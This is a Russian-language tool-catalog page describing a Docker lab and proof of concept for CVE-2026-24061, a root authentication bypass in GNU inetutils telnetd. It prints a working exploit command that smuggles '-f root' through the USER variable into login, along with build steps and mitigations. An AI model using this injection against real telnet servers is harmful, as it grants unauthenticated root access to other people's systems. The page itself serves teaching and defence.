Skip to content
KitploitKITPLOIT
ИнструментыБлог
Отправить
ИнструментыБлог
Отправить

Инструменты для хакинга, пентеста и кибербезопасности — ваш арсенал защиты!

Kitploit — это каталог инструментов для хакинга, кибербезопасности и пентестинга. Находите последние обновления проектов для поиска уязвимостей, анализа систем, автоматизации тестирования и усиления вашей безопасности.

··Ленты·Контакты·Конфиденциальность·© 2026 Kitploit

Каталог инструментов

Категории

Все категории
Loading categories
telnet-inetutils-auth-bypass-CVE-2026-24061 — Это простой PoC, который позволяет подчеркнуть серьёзность текущей и активно эксплуатируемой уязвимости Telnet, происходящей прямо сейчас. Почему люди до сих пор используют Telnet... уму непостижимо. | Kitploit
Инструменты/GitHubGitHub/jakeswiz/telnet-inetutils-auth-bypass-cve-2026-24061
Безопасность контейнеровАнализ уязвимостейЭксплуатацияТестирование на ПроникновениеОбучение и ОбразованиеЛаборатории и Практика
GitHubjakeswiz/telnet-inetutils-auth-bypass-cve-2026-24061

telnet-inetutils-auth-bypass-CVE-2026-24061

Это простой PoC, который позволяет подчеркнуть серьёзность текущей и активно эксплуатируемой уязвимости Telnet, происходящей прямо сейчас. Почему люди до сих пор используют Telnet... уму непостижимо.

Популярное

Смотреть все →

Откройте для себя самые используемые инструменты нашего сообщества.

Изучить все инструменты

Просмотрите нашу коллекцию инструментов

Смотреть все инструменты →
Поделиться
Репозиторий
16 месяцев назадЕщё не проверено

CVE-2026-24061: Обход аутентификации в GNU inetutils-telnetd

Docker-лаборатория для демонстрации CVE-2026-24061 — критической уязвимости обхода аутентификации в GNU inetutils telnetd, которая оставалась без исправления в течение 11 лет.

Уязвимость

Telnetd передаёт переменную окружения USER напрямую в /usr/bin/login без санитизации. Бинарный файл login имеет флаг -f, который пропускает аутентификацию (предназначен для предварительно аутентифицированных сессий). Установив USER='-f root', атакующий обманывает login, получая root-доступ без пароля.

Затронутые версии: GNU inetutils 1.9.3 (март 2015) — 2.7 Оценка CVSS: 9.8 (критическая) Исправление: обновление до inetutils 2.8+

Быстрый старт

root@kitploit:~
# Сборка образа
docker build -t telnetd-exploit .

# Запуск контейнера (попадаете в shell под пользователем user1)
docker run --rm -it telnetd-exploit

# Эксплуатация — получение root без пароля
USER='-f root' telnet -a localhost

Вы попадёте в root-оболочку. Выполните whoami, чтобы убедиться.

Как это работает

root@kitploit:~
1. Клиент подключается с: USER='-f root' telnet -a localhost
2. telnetd получает переменную окружения USER: "-f root"
3. telnetd выполняет: /usr/bin/login -f root
4. login интерпретирует -f как "пропустить аутентификацию, пользователь предварительно проверен"
5. Атакующий получает root-оболочку — пароль не требуется

Зачем существует -f

Флаг -f легитимен — он предназначен для сценариев, где пользователь уже аутентифицирован (например, из доверенной локальной сессии). Проблема в том, что telnetd не санитизирует переменную USER перед передачей в login, что позволяет удалённым атакующим внедрять флаг.

Влияние

По состоянию на январь 2026 года:

  • ~800 000 Telnet-серверов открыты по всему миру (Shadowserver)
  • ~290 000 проиндексировано в Shodan
  • Уязвимость активно эксплуатируется в дикой природе (каталог CISA KEV)

Почему не стоит использовать Telnet

Даже без этой ошибки Telnet передаёт всё в открытом виде — включая пароли. Используйте SSH.

ПротоколШифрованиеАутентификация
TelnetНетОткрытым текстом
SSHДаКлюч/Пароль

Файлы

root@kitploit:~
.
├── Dockerfile              # Создаёт уязвимый Debian-контейнер
├── docker-entrypoint.sh    # Запускает inetd, переключается на user1
└── README.md

Меры по смягчению

  1. Обновитесь до GNU inetutils 2.8+
  2. Отключите telnetd — заблокируйте порт 23
  3. Используйте SSH — на дворе 2026 год

Ссылки

  • CVE-2026-24061
  • Оригинальное уведомление
  • Запись в CISA KEV

Авторы

Лаборатория основана на leonjza/inetutils-telnetd-auth-bypass

Скачать инструмент